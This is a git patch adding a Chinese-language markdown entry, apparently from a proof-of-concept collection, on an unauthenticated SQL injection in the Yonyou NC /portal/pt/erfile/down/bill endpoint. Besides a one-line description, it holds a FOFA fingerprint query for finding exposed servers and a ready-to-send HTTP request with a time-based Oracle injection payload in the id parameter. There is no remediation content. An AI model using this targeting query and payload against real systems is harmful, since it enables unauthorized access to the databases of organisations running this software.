From 0debebc05d058ded9b366da4e44820a1b42ee9e3 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 2 May 2024 14:19:36 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BNC-bill=E5=AD=98?= =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC-bill存在SQL注入漏洞.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 用友NC-bill存在SQL注入漏洞.md diff --git a/用友NC-bill存在SQL注入漏洞.md b/用友NC-bill存在SQL注入漏洞.md new file mode 100644 index 0000000..d3c3bf0 --- /dev/null +++ b/用友NC-bill存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +## 用友NC-bill存在SQL注入漏洞 + +用友NC /portal/pt/erfile/down/bill存在SQL注入漏洞,未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。 + +## fofa +``` +icon_hash="1085941792" && body="/logo/images/logo.gif" +``` + + +## poc +``` +GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive + +```